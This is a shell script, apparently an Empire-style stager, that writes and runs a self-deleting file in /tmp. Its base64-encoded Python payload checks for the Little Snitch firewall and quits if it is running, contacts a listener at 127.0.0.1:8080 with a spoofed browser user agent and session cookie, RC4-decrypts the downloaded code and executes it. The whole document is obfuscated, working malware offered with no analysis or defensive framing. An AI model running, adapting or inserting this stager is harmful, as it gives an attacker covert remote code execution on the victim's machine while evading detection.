rm -f /tmp/empire.sh
echo '#!/bin/bash' >> /tmp/empire.sh
echo 'echo "import sys,base64,warnings;warnings.filterwarnings('\''ignore'\'');exec(base64.b64decode('\''aW1wb3J0IHN5czsKaW1wb3J0IHJlLCBzdWJwcm9jZXNzOwpjbWQgPSAicHMgLWVmIHwgZ3JlcCBMaXR0bGVcIFNuaXRjaCB8IGdyZXAgLXYgZ3' >> /tmp/empire.sh
echo 'JlcCIKcHMgPSBzdWJwcm9jZXNzLlBvcGVuKGNtZCwgc2hlbGw9VHJ1ZSwgc3Rkb3V0PXN1YnByb2Nlc3MuUElQRSwgc3RkZXJyPXN1YnByb2Nlc3MuUElQRSkKb3V0LCBlcnIgPSBwcy5jb21tdW5pY2F0ZSgpOwppZiByZS5zZWFyY2goIkxpdHRsZSBTbml0Y2giLC' >> /tmp/empire.sh
echo 'BvdXQuZGVjb2RlKCdVVEYtOCcpKToKICAgc3lzLmV4aXQoKTsKCmltcG9ydCB1cmxsaWIucmVxdWVzdDsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly' >> /tmp/empire.sh
echo '8xMjcuMC4wLjE6ODA4MCc7dD0nL2FkbWluL2dldC5waHAnOwpyZXE9dXJsbGliLnJlcXVlc3QuUmVxdWVzdChzZXJ2ZXIrdCk7CnByb3h5ID0gdXJsbGliLnJlcXVlc3QuUHJveHlIYW5kbGVyKCk7Cm8gPSB1cmxsaWIucmVxdWVzdC5idWlsZF9vcGVuZXIocHJveH' >> /tmp/empire.sh
echo 'kpOwpvLmFkZGhlYWRlcnM9WygnVXNlci1BZ2VudCcsVUEpLCAoIkNvb2tpZSIsICJzZXNzaW9uPWpzbnJWb0NHSkFiVi9FaS9Rb1RRN2xNV2Erbz0iKV07CnVybGxpYi5yZXF1ZXN0Lmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYi5yZXF1ZXN0LnVybG9wZW4ocm' >> /tmp/empire.sh
echo 'VxKS5yZWFkKCk7CklWPWFbMDo0XTsKZGF0YT1hWzQ6XTsKa2V5PUlWKydwcGNCYVVZdTkxMmYwOEdZSnh2S1BSaG1yUlE4UExONycuZW5jb2RlKCdVVEYtOCcpOwpTLGosb3V0PWxpc3QocmFuZ2UoMjU2KSksMCxbXTsKZm9yIGkgaW4gbGlzdChyYW5nZSgyNTYpKT' >> /tmp/empire.sh
echo 'oKICAgIGo9KGorU1tpXStrZXlbaSVsZW4oa2V5KV0pJTI1NjsKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV07Cmk9aj0wOwpmb3IgY2hhciBpbiBkYXRhOgogICAgaT0oaSsxKSUyNTY7CiAgICBqPShqK1NbaV0pJTI1NjsKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV07Ci' >> /tmp/empire.sh
echo 'AgICBvdXQuYXBwZW5kKGNocihjaGFyXlNbKFNbaV0rU1tqXSklMjU2XSkpOwpleGVjKCcnLmpvaW4ob3V0KSk7'\''));" | python3 &' >> /tmp/empire.sh
echo 'rm -f "$0"' >> /tmp/empire.sh
echo 'exit' >> /tmp/empire.sh
chmod +x /tmp/empire.sh
/tmp/empire.sh
